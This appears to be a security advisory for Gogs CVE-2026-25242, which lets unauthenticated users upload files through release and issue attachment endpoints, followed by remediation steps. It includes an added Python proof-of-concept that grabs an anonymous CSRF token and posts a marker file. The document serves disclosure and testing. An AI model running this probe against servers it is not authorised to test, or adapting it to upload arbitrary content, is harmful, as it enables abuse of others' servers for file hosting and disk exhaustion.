Gogs · Gogs · CVE-2026-25242
**Name of the Vulnerable Software and Affected Versions**
Gogs versions prior to 0.14.1
Gogs versions 0.13.4 and below
**Description**
Gogs, an open-source self-hosted Git service, accepts attachment uploads from unauthenticated users in its default configuration. When the `RequireSigninView` setting is disabled (the default), any remote user can upload arbitrary files to the server through the `/releases/attachments` and `/issues/attachments` endpoints, handled by `UploadReleaseAttachment()` and `UploadIssueAttachment()`; the root cause is that these handlers do not require a signed-in user. CSRF protection is applied to the endpoints, but it does not gate on authentication: an anonymous session is issued a valid CSRF token, so an attacker obtains one anonymously and sends a POST request to either endpoint carrying that token together with the file to be uploaded. The content is then stored on the server. The instance can therefore be misused as a public file host, which can lead to disk exhaustion (a denial-of-service condition), hosting of unwanted content, or malware distribution.
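The exchange described above, as an added example that is not part of the advisory or of the Gogs code base: a probe that fetches an anonymously reachable page, lifts the CSRF token from it, and attempts an attachment upload without signing in. Names that are assumptions rather than facts from the advisory: the token is assumed to appear in a `<meta name="_csrf" content="...">` tag, the upload form is assumed to carry it in a `_csrf` field and the file in a `file` field, and a 2xx reply is taken to mean the upload was accepted. The caller supplies the page URL and the full upload URL, since the advisory names the endpoint paths without saying where they are mounted.

```python
"""Added example (not from the advisory or the Gogs project): probe for the
anonymous attachment upload described in CVE-2026-25242.

Assumptions, not stated in the advisory: the CSRF token is exposed in a
<meta name="_csrf" content="..."> tag on any anonymously reachable page, the
upload form sends it in a "_csrf" field, and the file goes in a "file" field.
"""
import re
import secrets
import urllib.error
import urllib.request
from http.cookiejar import CookieJar

# Assumed tag name; adjust if the instance renders the token differently.
CSRF_META = re.compile(r'<meta\s+name="_csrf"\s+content="([^"]+)"', re.IGNORECASE)


def extract_csrf_token(html):
    """Return the CSRF token embedded in a rendered page, or None if absent."""
    m = CSRF_META.search(html)
    return m.group(1) if m else None


def build_multipart(fields, filename, data, boundary=None):
    """Encode form fields plus one file part as multipart/form-data.

    Returns (body, content_type). A fixed boundary may be passed for testing;
    otherwise a random one is generated.
    """
    boundary = boundary or "----probe" + secrets.token_hex(8)
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
            f"\r\n\r\n{value}\r\n".encode()
        )
    parts.append(
        f'--{boundary}\r\nContent-Disposition: form-data; name="file"; '
        f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n'.encode()
        + data + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts), f"multipart/form-data; boundary={boundary}"


def probe(page_url, upload_url, timeout=10.0):
    """Fetch page_url anonymously, take its CSRF token, and POST a small text
    file to upload_url with that token and no session cookie for any user.

    Only run this against an instance you are authorised to test: a successful
    probe leaves a small text file in the server's attachment storage.
    """
    jar = CookieJar()  # keeps the anonymous session/CSRF cookies between requests
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    with opener.open(page_url, timeout=timeout) as resp:
        token = extract_csrf_token(resp.read().decode("utf-8", "replace"))
    if token is None:
        return {"vulnerable": None, "reason": "no CSRF token on anonymous page"}
    marker = b"CVE-2026-25242 probe " + secrets.token_hex(8).encode()
    body, ctype = build_multipart({"_csrf": token}, "probe.txt", marker)
    req = urllib.request.Request(
        upload_url, data=body, method="POST", headers={"Content-Type": ctype}
    )
    try:
        with opener.open(req, timeout=timeout) as resp:
            status, payload = resp.status, resp.read()
    except urllib.error.HTTPError as err:
        status, payload = err.code, err.read()
    # A 2xx reply means the server accepted and stored the anonymous upload.
    return {
        "vulnerable": 200 <= status < 300,
        "status": status,
        "response": payload[:200].decode("utf-8", "replace"),
    }


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1], sys.argv[2]))
```

The probe deliberately sends no credentials at all; a patched instance should reject the POST (for example with a redirect to the sign-in page or a 4xx status), while a vulnerable one returns 2xx and the marker file can afterwards be found in the attachment storage directory.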
**Recommendations**
Versions prior to 0.14.1 should be updated to version 0.14.1 or later.
Versions 0.13.4 and below should be updated to version 0.14.1 or later.
Until the upgrade is applied, enabling the `RequireSigninView` setting named above (`REQUIRE_SIGNIN_VIEW = true` in the `[service]` section of `app.ini`) removes anonymous access to the upload endpoints, at the cost of hiding all repositories from visitors who are not signed in. After upgrading, review the attachment storage directory for files that were uploaded anonymously and are not referenced by any issue or release.